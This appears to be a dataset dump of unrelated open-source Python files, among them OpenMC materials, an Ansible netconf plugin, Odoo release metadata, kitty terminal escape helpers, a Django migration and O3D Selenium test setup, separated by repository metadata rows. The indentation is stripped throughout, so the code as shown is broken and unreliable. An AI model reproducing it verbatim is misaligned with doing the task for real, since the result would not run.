for nuc, atoms_per_cc in self.get_nuclide_atom_densities().values():
density_i = 1e24 * atoms_per_cc * openmc.data.atomic_mass(nuc) \
/ openmc.data.AVOGADRO
if nuclide is None or nuclide == nuc:
mass_density += density_i
return mass_density
def get_mass(self, nuclide=None):
"""Return mass of one or all nuclides.
Note that this method requires that the :attr:`Material.volume` has
already been set.
Parameters
----------
nuclides : str, optional
Nuclide for which mass is desired. If not specified, the density
for the entire material is given.
Returns
-------
float
Mass of the nuclide/material in [g]
"""
if self.volume is None:
raise ValueError("Volume must be set in order to determine mass.")
return self.volume*self.get_mass_density(nuclide)
def clone(self, memo=None):
"""Create a copy of this material with a new unique ID.
Parameters
----------
memo : dict or None
A nested dictionary of previously cloned objects. This parameter
is used internally and should not be specified by the user.
Returns
-------
clone : openmc.Material
The clone of this material
"""
if memo is None:
memo = {}
# If no nemoize'd clone exists, instantiate one
if self not in memo:
# Temporarily remove paths -- this is done so that when the clone is
# made, it doesn't create a copy of the paths (which are specific to
# an instance)
paths = self._paths
self._paths = None
clone = deepcopy(self)
clone.id = None
clone._num_instances = None
# Restore paths on original instance
self._paths = paths
# Memoize the clone
memo[self] = clone
return memo[self]
def _get_nuclide_xml(self, nuclide, distrib=False):
xml_element = ET.Element("nuclide")
xml_element.set("name", nuclide[0])
if not distrib:
if nuclide[2] == 'ao':
xml_element.set("ao", str(nuclide[1]))
else:
xml_element.set("wo", str(nuclide[1]))
return xml_element
def _get_macroscopic_xml(self, macroscopic):
xml_element = ET.Element("macroscopic")
xml_element.set("name", macroscopic)
return xml_element
def _get_nuclides_xml(self, nuclides, distrib=False):
xml_elements = []
for nuclide in nuclides:
xml_elements.append(self._get_nuclide_xml(nuclide, distrib))
return xml_elements
def to_xml_element(self, cross_sections=None):
"""Return XML representation of the material
Parameters
----------
cross_sections : str
Path to an XML cross sections listing file
Returns
-------
element : xml.etree.ElementTree.Element
XML element containing material data
"""
# Create Material XML element
element = ET.Element("material")
element.set("id", str(self._id))
if len(self._name) > 0:
element.set("name", str(self._name))
if self._depletable:
element.set("depletable", "true")
# Create temperature XML subelement
if self.temperature is not None:
subelement = ET.SubElement(element, "temperature")
subelement.text = str(self.temperature)
# Create density XML subelement
if self._density is not None or self._density_units == 'sum':
subelement = ET.SubElement(element, "density")
if self._density_units != 'sum':
subelement.set("value", str(self._density))
subelement.set("units", self._density_units)
else:
raise ValueError('Density has not been set for material {}!'
.format(self.id))
if not self._convert_to_distrib_comps:
if self._macroscopic is None:
# Create nuclide XML subelements
subelements = self._get_nuclides_xml(self._nuclides)
for subelement in subelements:
element.append(subelement)
else:
# Create macroscopic XML subelements
subelement = self._get_macroscopic_xml(self._macroscopic)
element.append(subelement)
else:
subelement = ET.SubElement(element, "compositions")
comps = []
allnucs = self._nuclides
dist_per_type = allnucs[0][2]
for nuc in allnucs:
if nuc[2] != dist_per_type:
msg = 'All nuclides and elements in a distributed ' \
'material must have the same type, either ao or wo'
raise ValueError(msg)
comps.append(nuc[1])
if self._distrib_otf_file is None:
# Create values and units subelements
subsubelement = ET.SubElement(subelement, "values")
subsubelement.text = ' '.join([str(c) for c in comps])
subsubelement = ET.SubElement(subelement, "units")
subsubelement.text = dist_per_type
else:
# Specify the materials file
subsubelement = ET.SubElement(subelement, "otf_file_path")
subsubelement.text = self._distrib_otf_file
if self._macroscopic is None:
# Create nuclide XML subelements
subelements = self._get_nuclides_xml(self._nuclides,
distrib=True)
for subelement_nuc in subelements:
subelement.append(subelement_nuc)
else:
# Create macroscopic XML subelements
subsubelement = self._get_macroscopic_xml(self._macroscopic)
subelement.append(subsubelement)
if self._sab:
for sab in self._sab:
subelement = ET.SubElement(element, "sab")
subelement.set("name", sab[0])
if sab[1] != 1.0:
subelement.set("fraction", str(sab[1]))
if self._isotropic:
subelement = ET.SubElement(element, "isotropic")
subelement.text = ' '.join(self._isotropic)
return element
class Materials(cv.CheckedList):
"""Collection of Materials used for an OpenMC simulation.
This class corresponds directly to the materials.xml input file. It can be
thought of as a normal Python list where each member is a
:class:`Material`. It behaves like a list as the following example
demonstrates:
>>> fuel = openmc.Material()
>>> clad = openmc.Material()
>>> water = openmc.Material()
>>> m = openmc.Materials([fuel])
>>> m.append(water)
>>> m += [clad]
Parameters
----------
materials : Iterable of openmc.Material
Materials to add to the collection
cross_sections : str
Indicates the path to an XML cross section listing file (usually named
cross_sections.xml). If it is not set, the
:envvar:`OPENMC_CROSS_SECTIONS` environment variable will be used for
continuous-energy calculations and
:envvar:`OPENMC_MG_CROSS_SECTIONS` will be used for multi-group
calculations to find the path to the HDF5 cross section file.
multipole_library : str
Indicates the path to a directory containing a windowed multipole
cross section library. If it is not set, the
:envvar:`OPENMC_MULTIPOLE_LIBRARY` environment variable will be used. A
multipole library is optional.
"""
def __init__(self, materials=None):
super().__init__(Material, 'materials collection')
self._cross_sections = None
self._multipole_library = None
if materials is not None:
self += materials
@property
def cross_sections(self):
return self._cross_sections
@property
def multipole_library(self):
return self._multipole_library
@cross_sections.setter
def cross_sections(self, cross_sections):
cv.check_type('cross sections', cross_sections, str)
self._cross_sections = cross_sections
@multipole_library.setter
def multipole_library(self, multipole_library):
cv.check_type('cross sections', multipole_library, str)
self._multipole_library = multipole_library
def append(self, material):
"""Append material to collection
Parameters
----------
material : openmc.Material
Material to append
"""
super().append(material)
def insert(self, index, material):
"""Insert material before index
Parameters
----------
index : int
Index in list
material : openmc.Material
Material to insert
"""
super().insert(index, material)
def make_isotropic_in_lab(self):
for material in self:
material.make_isotropic_in_lab()
def _create_material_subelements(self, root_element):
for material in sorted(self, key=lambda x: x.id):
root_element.append(material.to_xml_element(self.cross_sections))
def _create_cross_sections_subelement(self, root_element):
if self._cross_sections is not None:
element = ET.SubElement(root_element, "cross_sections")
element.text = str(self._cross_sections)
def _create_multipole_library_subelement(self, root_element):
if self._multipole_library is not None:
element = ET.SubElement(root_element, "multipole_library")
element.text = str(self._multipole_library)
def export_to_xml(self, path='materials.xml'):
"""Export material collection to an XML file.
Parameters
----------
path : str
Path to file to write. Defaults to 'materials.xml'.
"""
root_element = ET.Element("materials")
self._create_cross_sections_subelement(root_element)
self._create_multipole_library_subelement(root_element)
self._create_material_subelements(root_element)
# Clean the indentation in the file to be user-readable
clean_xml_indentation(root_element)
# Write the XML Tree to the materials.xml file
tree = ET.ElementTree(root_element)
tree.write(path, xml_declaration=True, encoding='utf-8')
| mit | -6,152,514,071,550,136,000 | 33.867317 | 83 | 0.574303 | false |
Inspq/ansible | lib/ansible/plugins/connection/netconf.py | 1 | 4517 | #
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
import socket
import json
import signal
import logging
from ansible import constants as C
from ansible.errors import AnsibleConnectionFailure, AnsibleError
from ansible.plugins.connection import ConnectionBase, ensure_connect
from ansible.module_utils.six.moves import StringIO
try:
from ncclient import manager
from ncclient.operations import RPCError
from ncclient.transport.errors import SSHUnknownHostError
from ncclient.xml_ import to_ele, to_xml
except ImportError:
raise AnsibleError("ncclient is not installed")
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
logging.getLogger('ncclient').setLevel(logging.INFO)
class Connection(ConnectionBase):
''' NetConf connections '''
transport = 'netconf'
has_pipelining = False
def __init__(self, play_context, new_stdin, *args, **kwargs):
super(Connection, self).__init__(play_context, new_stdin, *args, **kwargs)
self._network_os = self._play_context.network_os or 'default'
display.display('network_os is set to %s' % self._network_os, log_only=True)
self._manager = None
self._connected = False
def log(self, msg):
msg = 'h=%s u=%s %s' % (self._play_context.remote_addr, self._play_context.remote_user, msg)
logger.debug(msg)
def _connect(self):
super(Connection, self)._connect()
display.display('ssh connection done, stating ncclient', log_only=True)
allow_agent = True
if self._play_context.password is not None:
allow_agent = False
key_filename = None
if self._play_context.private_key_file:
key_filename = os.path.expanduser(self._play_context.private_key_file)
if not self._network_os:
raise AnsibleConnectionError('network_os must be set for netconf connections')
try:
self._manager = manager.connect(
host=self._play_context.remote_addr,
port=self._play_context.port or 830,
username=self._play_context.remote_user,
password=self._play_context.password,
key_filename=str(key_filename),
hostkey_verify=C.HOST_KEY_CHECKING,
look_for_keys=C.PARAMIKO_LOOK_FOR_KEYS,
allow_agent=allow_agent,
timeout=self._play_context.timeout,
device_params={'name': self._network_os}
)
except SSHUnknownHostError as exc:
raise AnsibleConnectionFailure(str(exc))
if not self._manager.connected:
return (1, '', 'not connected')
display.display('ncclient manager object created successfully', log_only=True)
self._connected = True
return (0, self._manager.session_id, '')
def close(self):
if self._manager:
self._manager.close_session()
self._connected = False
super(Connection, self).close()
@ensure_connect
def exec_command(self, request):
"""Sends the request to the node and returns the reply
"""
if request == 'open_session()':
return (0, 'ok', '')
req = to_ele(request)
if req is None:
return (1, '', 'unable to parse request')
try:
reply = self._manager.rpc(req)
except RPCError as exc:
return (1, '', to_xml(exc.xml))
return (0, reply.data_xml, '')
def put_file(self, in_path, out_path):
"""Transfer a file from local to remote"""
pass
def fetch_file(self, in_path, out_path):
"""Fetch a file from remote to local"""
pass
| gpl-3.0 | -3,208,970,745,957,846,000 | 31.496403 | 100 | 0.640469 | false |
nathanaevitas/odoo | openerp/release.py | 1 | 2634 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-TODAY OpenERP S.A. <http://www.openerp.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
RELEASE_LEVELS = [ALPHA, BETA, RELEASE_CANDIDATE, FINAL] = ['alpha', 'beta', 'candidate', 'final']
RELEASE_LEVELS_DISPLAY = {ALPHA: ALPHA,
BETA: BETA,
RELEASE_CANDIDATE: 'rc',
FINAL: ''}
# version_info format: (MAJOR, MINOR, MICRO, RELEASE_LEVEL, SERIAL)
# inspired by Python's own sys.version_info, in order to be
# properly comparable using normal operarors, for example:
# (6,1,0,'beta',0) < (6,1,0,'candidate',1) < (6,1,0,'candidate',2)
# (6,1,0,'candidate',2) < (6,1,0,'final',0) < (6,1,2,'final',0)
version_info = (8, 0, 0, FINAL, 0)
version = '.'.join(map(str, version_info[:2])) + RELEASE_LEVELS_DISPLAY[version_info[3]] + str(version_info[4] or '')
series = serie = major_version = '.'.join(map(str, version_info[:2]))
product_name = 'Odoo'
description = 'Odoo Server'
long_desc = '''Odoo is a complete ERP and CRM. The main features are accounting (analytic
and financial), stock management, sales and purchases management, tasks
automation, marketing campaigns, help desk, POS, etc. Technical features include
a distributed server, flexible workflows, an object database, a dynamic GUI,
customizable reports, and XML-RPC interfaces.
'''
classifiers = """Development Status :: 5 - Production/Stable
License :: OSI Approved :: GNU Affero General Public License v3
Programming Language :: Python
"""
url = 'https://www.odoo.com'
author = 'OpenERP S.A.'
author_email = '[email protected]'
license = 'AGPL-3'
nt_service_name = "odoo-server-" + series
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
version += '-20151104'
# hash = 'a69205d'
| agpl-3.0 | -2,245,725,345,032,258,300 | 44.413793 | 117 | 0.643888 | false |
waynechu/PythonProject | dns/rdtypes/ANY/AVC.py | 2 | 1027 | # Copyright (C) Dnspython Contributors, see LICENSE for text of ISC license
# Copyright (C) 2016 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
import dns.rdtypes.txtbase
class AVC(dns.rdtypes.txtbase.TXTBase):
"""AVC record
@see: U{http://www.iana.org/assignments/dns-parameters/AVC/avc-completed-template}"""
| mit | -1,819,311,365,849,486,800 | 40.08 | 89 | 0.773126 | false |
kovidgoyal/kitty | kittens/tui/operations.py | 1 | 11292 | #!/usr/bin/env python3
# vim:fileencoding=utf-8
# License: GPL v3 Copyright: 2018, Kovid Goyal <kovid at kovidgoyal.net>
import sys
from contextlib import contextmanager
from functools import wraps
from typing import (
IO, Any, Callable, Dict, Generator, Optional, Tuple, TypeVar, Union
)
from kitty.rgb import Color, color_as_sharp, to_color
from kitty.typing import GraphicsCommandType, HandlerType, ScreenSize
from .operations_stub import CMD
GraphicsCommandType, ScreenSize # needed for stub generation
S7C1T = '\033 F'
SAVE_CURSOR = '\0337'
RESTORE_CURSOR = '\0338'
SAVE_PRIVATE_MODE_VALUES = '\033[?s'
RESTORE_PRIVATE_MODE_VALUES = '\033[?r'
SAVE_COLORS = '\033[#P'
RESTORE_COLORS = '\033[#Q'
MODES = dict(
LNM=(20, ''),
IRM=(4, ''),
DECKM=(1, '?'),
DECSCNM=(5, '?'),
DECOM=(6, '?'),
DECAWM=(7, '?'),
DECARM=(8, '?'),
DECTCEM=(25, '?'),
MOUSE_BUTTON_TRACKING=(1000, '?'),
MOUSE_MOTION_TRACKING=(1002, '?'),
MOUSE_MOVE_TRACKING=(1003, '?'),
FOCUS_TRACKING=(1004, '?'),
MOUSE_UTF8_MODE=(1005, '?'),
MOUSE_SGR_MODE=(1006, '?'),
MOUSE_URXVT_MODE=(1015, '?'),
ALTERNATE_SCREEN=(1049, '?'),
BRACKETED_PASTE=(2004, '?'),
)
F = TypeVar('F')
all_cmds: Dict[str, Callable] = {}
def cmd(f: F) -> F:
all_cmds[f.__name__] = f # type: ignore
return f
@cmd
def set_mode(which: str, private: bool = True) -> str:
num, private_ = MODES[which]
return '\033[{}{}h'.format(private_, num)
@cmd
def reset_mode(which: str) -> str:
num, private = MODES[which]
return '\033[{}{}l'.format(private, num)
@cmd
def clear_screen() -> str:
return '\033[H\033[2J'
@cmd
def clear_to_end_of_screen() -> str:
return '\033[J'
@cmd
def clear_to_eol() -> str:
return '\033[K'
@cmd
def reset_terminal() -> str:
return '\033]\033\\\033c'
@cmd
def bell() -> str:
return '\a'
@cmd
def beep() -> str:
return '\a'
@cmd
def set_window_title(value: str) -> str:
return '\033]2;' + value.replace('\033', '').replace('\x9c', '') + '\033\\'
@cmd
def set_line_wrapping(yes_or_no: bool) -> str:
return set_mode('DECAWM') if yes_or_no else reset_mode('DECAWM')
@cmd
def set_cursor_visible(yes_or_no: bool) -> str:
return set_mode('DECTCEM') if yes_or_no else reset_mode('DECTCEM')
@cmd
def set_cursor_position(x: int, y: int) -> str: # (0, 0) is top left
return '\033[{};{}H'.format(y + 1, x + 1)
@cmd
def move_cursor_by(amt: int, direction: str) -> str:
suffix = {'up': 'A', 'down': 'B', 'right': 'C', 'left': 'D'}[direction]
return f'\033[{amt}{suffix}'
@cmd
def set_cursor_shape(shape: str = 'block', blink: bool = True) -> str:
val = {'block': 1, 'underline': 3, 'bar': 5}.get(shape, 1)
if not blink:
val += 1
return '\033[{} q'.format(val)
@cmd
def set_scrolling_region(screen_size: Optional['ScreenSize'] = None, top: Optional[int] = None, bottom: Optional[int] = None) -> str:
if screen_size is None:
return '\033[r'
if top is None:
top = 0
if bottom is None:
bottom = screen_size.rows - 1
if bottom < 0:
bottom = screen_size.rows - 1 + bottom
else:
bottom += 1
return '\033[{};{}r'.format(top + 1, bottom + 1)
@cmd
def scroll_screen(amt: int = 1) -> str:
return '\033[' + str(abs(amt)) + ('T' if amt < 0 else 'S')
STANDARD_COLORS = {name: i for i, name in enumerate(
'black red green yellow blue magenta cyan gray'.split())}
STANDARD_COLORS['white'] = STANDARD_COLORS['gray']
UNDERLINE_STYLES = {name: i + 1 for i, name in enumerate(
'straight double curly'.split())}
ColorSpec = Union[int, str, Tuple[int, int, int]]
def color_code(color: ColorSpec, intense: bool = False, base: int = 30) -> str:
if isinstance(color, str):
e = str((base + 60 if intense else base) + STANDARD_COLORS[color])
elif isinstance(color, int):
e = '{}:5:{}'.format(base + 8, max(0, min(color, 255)))
else:
e = '{}:2:{}:{}:{}'.format(base + 8, *color)
return e
@cmd
def sgr(*parts: str) -> str:
return '\033[{}m'.format(';'.join(parts))
@cmd
def colored(
text: str,
color: ColorSpec,
intense: bool = False,
reset_to: Optional[ColorSpec] = None,
reset_to_intense: bool = False
) -> str:
e = color_code(color, intense)
return '\033[{}m{}\033[{}m'.format(e, text, 39 if reset_to is None else color_code(reset_to, reset_to_intense))
@cmd
def faint(text: str) -> str:
return colored(text, 'black', True)
@cmd
def styled(
text: str,
fg: Optional[ColorSpec] = None,
bg: Optional[ColorSpec] = None,
fg_intense: bool = False,
bg_intense: bool = False,
italic: Optional[bool] = None,
bold: Optional[bool] = None,
underline: Optional[str] = None,
underline_color: Optional[ColorSpec] = None,
reverse: Optional[bool] = None
) -> str:
start, end = [], []
if fg is not None:
start.append(color_code(fg, fg_intense))
end.append('39')
if bg is not None:
start.append(color_code(bg, bg_intense, 40))
end.append('49')
if underline_color is not None:
if isinstance(underline_color, str):
underline_color = STANDARD_COLORS[underline_color]
start.append(color_code(underline_color, base=50))
end.append('59')
if underline is not None:
start.append('4:{}'.format(UNDERLINE_STYLES[underline]))
end.append('4:0')
if italic is not None:
s, e = (start, end) if italic else (end, start)
s.append('3')
e.append('23')
if bold is not None:
s, e = (start, end) if bold else (end, start)
s.append('1')
e.append('22')
if reverse is not None:
s, e = (start, end) if reverse else (end, start)
s.append('7')
e.append('27')
if not start:
return text
return '\033[{}m{}\033[{}m'.format(';'.join(start), text, ';'.join(end))
def serialize_gr_command(cmd: Dict[str, Union[int, str]], payload: Optional[bytes] = None) -> bytes:
from .images import GraphicsCommand
gc = GraphicsCommand()
for k, v in cmd.items():
setattr(gc, k, v)
return gc.serialize(payload or b'')
@cmd
def gr_command(cmd: Union[Dict, 'GraphicsCommandType'], payload: Optional[bytes] = None) -> str:
if isinstance(cmd, dict):
raw = serialize_gr_command(cmd, payload)
else:
raw = cmd.serialize(payload or b'')
return raw.decode('ascii')
@cmd
def clear_images_on_screen(delete_data: bool = False) -> str:
from .images import GraphicsCommand
gc = GraphicsCommand()
gc.a = 'd'
gc.d = 'A' if delete_data else 'a'
return gc.serialize().decode('ascii')
def init_state(alternate_screen: bool = True) -> str:
ans = (
S7C1T + SAVE_CURSOR + SAVE_PRIVATE_MODE_VALUES + reset_mode('LNM') +
reset_mode('IRM') + reset_mode('DECKM') + reset_mode('DECSCNM') +
set_mode('DECARM') + set_mode('DECAWM') +
set_mode('DECTCEM') + reset_mode('MOUSE_BUTTON_TRACKING') +
reset_mode('MOUSE_MOTION_TRACKING') + reset_mode('MOUSE_MOVE_TRACKING') +
reset_mode('FOCUS_TRACKING') + reset_mode('MOUSE_UTF8_MODE') +
reset_mode('MOUSE_SGR_MODE') + reset_mode('MOUSE_UTF8_MODE') +
set_mode('BRACKETED_PASTE') + SAVE_COLORS +
'\033[*x' # reset DECSACE to default region select
)
if alternate_screen:
ans += set_mode('ALTERNATE_SCREEN') + reset_mode('DECOM')
ans += clear_screen()
ans += '\033[>31u' # extended keyboard mode
return ans
def reset_state(normal_screen: bool = True) -> str:
ans = ''
ans += '\033[<u' # restore keyboard mode
if normal_screen:
ans += reset_mode('ALTERNATE_SCREEN')
ans += RESTORE_PRIVATE_MODE_VALUES
ans += RESTORE_CURSOR
ans += RESTORE_COLORS
return ans
@contextmanager
def cursor(write: Callable[[str], None]) -> Generator[None, None, None]:
write(SAVE_CURSOR)
yield
write(RESTORE_CURSOR)
@contextmanager
def alternate_screen(f: Optional[IO[str]] = None) -> Generator[None, None, None]:
f = f or sys.stdout
print(set_mode('ALTERNATE_SCREEN'), end='', file=f)
yield
print(reset_mode('ALTERNATE_SCREEN'), end='', file=f)
@contextmanager
def raw_mode(fd: Optional[int] = None) -> Generator[None, None, None]:
import tty
import termios
if fd is None:
fd = sys.stdin.fileno()
old = termios.tcgetattr(fd)
try:
tty.setraw(fd)
yield
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old)
@cmd
def set_default_colors(
fg: Optional[Union[Color, str]] = None,
bg: Optional[Union[Color, str]] = None,
cursor: Optional[Union[Color, str]] = None,
select_bg: Optional[Union[Color, str]] = None,
select_fg: Optional[Union[Color, str]] = None
) -> str:
ans = ''
def item(which: Optional[Union[Color, str]], num: int) -> None:
nonlocal ans
if which is None:
ans += '\x1b]1{}\x1b\\'.format(num)
else:
if isinstance(which, Color):
q = color_as_sharp(which)
else:
x = to_color(which)
assert x is not None
q = color_as_sharp(x)
ans += '\x1b]{};{}\x1b\\'.format(num, q)
item(fg, 10)
item(bg, 11)
item(cursor, 12)
item(select_bg, 17)
item(select_fg, 19)
return ans
@cmd
def write_to_clipboard(data: Union[str, bytes], use_primary: bool = False) -> str:
if isinstance(data, str):
data = data.encode('utf-8')
from base64 import standard_b64encode
fmt = 'p' if use_primary else 'c'
def esc(chunk: str) -> str:
return '\x1b]52;{};{}\x07'.format(fmt, chunk)
ans = esc('!') # clear clipboard buffer
for chunk in (data[i:i+512] for i in range(0, len(data), 512)):
s = standard_b64encode(chunk).decode('ascii')
ans += esc(s)
return ans
@cmd
def request_from_clipboard(use_primary: bool = False) -> str:
return '\x1b]52;{};?\x07'.format('p' if use_primary else 'c')
# Boilerplate to make operations available via Handler.cmd {{{
def writer(handler: HandlerType, func: Callable) -> Callable:
@wraps(func)
def f(*a: Any, **kw: Any) -> None:
handler.write(func(*a, **kw))
return f
def commander(handler: HandlerType) -> CMD:
ans = CMD()
for name, func in all_cmds.items():
setattr(ans, name, writer(handler, func))
return ans
def func_sig(func: Callable) -> Generator[str, None, None]:
import inspect
import re
s = inspect.signature(func)
for val in s.parameters.values():
yield re.sub(r'ForwardRef\([\'"](\w+?)[\'"]\)', r'\1', str(val).replace('NoneType', 'None'))
def as_type_stub() -> str:
ans = [
'from typing import * # noqa',
'from kitty.typing import GraphicsCommandType, ScreenSize',
'from kitty.rgb import Color',
'import kitty.rgb',
]
methods = []
for name, func in all_cmds.items():
args = ', '.join(func_sig(func))
if args:
args = ', ' + args
methods.append(' def {}(self{}) -> str: pass'.format(name, args))
ans += ['', '', 'class CMD:'] + methods
return '\n'.join(ans) + '\n\n\n'
# }}}
| gpl-3.0 | -8,834,894,098,076,934,000 | 26.144231 | 133 | 0.590418 | false |
DYWCn/mxonline | MXOnline/apps/origanization/migrations/0001_initial.py | 1 | 3648 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2017-03-24 08:13
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CityDict',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='\u673a\u6784\u540d\u79f0')),
('desc', models.CharField(max_length=100, verbose_name='\u57ce\u5e02\u63cf\u8ff0')),
('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\u52a0\u5165\u65f6\u95f4')),
],
options={
'verbose_name': '\u673a\u6784',
'verbose_name_plural': '\u673a\u6784',
},
),
migrations.CreateModel(
name='CourseOrg',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='\u673a\u6784\u540d\u79f0')),
('desc', models.TextField(verbose_name='\u673a\u6784\u4ecb\u7ecd')),
('click_num', models.IntegerField(default=0, verbose_name='\u70b9\u51fb\u91cf')),
('fav_num', models.IntegerField(default=0, verbose_name='\u6536\u85cf\u4eba\u6570')),
('cover_image', models.ImageField(upload_to='org/cover_img/%Y/%m', verbose_name='\u5c01\u9762')),
('address', models.CharField(max_length=100, verbose_name='\u673a\u6784\u5730\u5740')),
('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\u52a0\u5165\u65f6\u95f4')),
('city', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='origanization.CityDict', verbose_name='\u6240\u5728\u57ce\u5e02')),
],
options={
'verbose_name': '\u673a\u6784',
'verbose_name_plural': '\u673a\u6784',
},
),
migrations.CreateModel(
name='Teacher',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=20, verbose_name='\u8bb2\u5e08\u59d3\u540d')),
('work_years', models.IntegerField(default=0, verbose_name='\u5de5\u4f5c\u65f6\u95f4')),
('work_company', models.CharField(max_length=20, verbose_name='\u6240\u5c5e\u673a\u6784')),
('characters', models.CharField(max_length=50, verbose_name='\u6559\u5b66\u7279\u70b9')),
('click_num', models.IntegerField(default=0, verbose_name='\u70b9\u51fb\u91cf')),
('fav_num', models.IntegerField(default=0, verbose_name='\u6536\u85cf\u4eba\u6570')),
('cover_image', models.ImageField(upload_to='org/cover_img/%Y/%m', verbose_name='\u5c01\u9762')),
('add_time', models.DateTimeField(default=datetime.datetime.now, verbose_name='\u52a0\u5165\u65f6\u95f4')),
('org', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='origanization.CourseOrg', verbose_name='\u673a\u6784')),
],
options={
'verbose_name': '\u8bb2\u5e08\u4fe1\u606f',
'verbose_name_plural': '\u8bb2\u5e08\u4fe1\u606f',
},
),
]
| mit | -4,469,214,834,793,879,000 | 52.647059 | 159 | 0.587171 | false |
rwatson/chromium-capsicum | o3d/tests/selenium/main.py | 1 | 24571 | #!/usr/bin/python2.4
# Copyright 2009, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Selenium tests for the O3D plugin.
Sets up a local Selenium Remote Control server and a static file
server that serves files off the o3d directory.
Launches browsers to test the local build of the o3d plugin
and reports results back to the user.
"""
import os
import sys
script_dir = os.path.normpath(os.path.dirname(os.path.abspath(__file__)))
o3d_dir = os.path.dirname(os.path.dirname(script_dir))
src_dir = os.path.dirname(o3d_dir)
third_party_dir = os.path.join(src_dir, 'third_party')
o3d_third_party_dir = os.path.join(o3d_dir, 'third_party')
gflags_dir = os.path.join(o3d_third_party_dir, 'gflags', 'python')
selenium_dir = os.path.join(third_party_dir, 'selenium_rc', 'files')
selenium_py_dir = os.path.join(selenium_dir, 'selenium-python-client-driver')
sys.path.append(gflags_dir)
sys.path.append(selenium_py_dir)
import re
import SimpleHTTPServer
import socket
import SocketServer
import subprocess
import threading
import time
import unittest
import gflags
import javascript_unit_tests
import test_runner
import selenium
import samples_tests
import selenium_constants
import selenium_utilities
import pdiff_test
import Queue
if sys.platform == 'win32' or sys.platform == 'cygwin':
default_java_exe = "java.exe"
else:
default_java_exe = "java"
# Command line flags
FLAGS = gflags.FLAGS
gflags.DEFINE_boolean("verbose", False, "verbosity")
gflags.DEFINE_boolean("screenshots", False, "takes screenshots")
gflags.DEFINE_string(
"java",
default_java_exe,
"specifies the path to the java executable.")
gflags.DEFINE_string(
"selenium_server",
os.path.join(selenium_dir, 'selenium-server', 'selenium-server.jar'),
"specifies the path to the selenium server jar.")
gflags.DEFINE_string(
"product_dir",
None,
"specifies the path to the build output directory.")
gflags.DEFINE_string(
"screencompare",
"",
"specifies the directory in which perceptualdiff resides.\n"
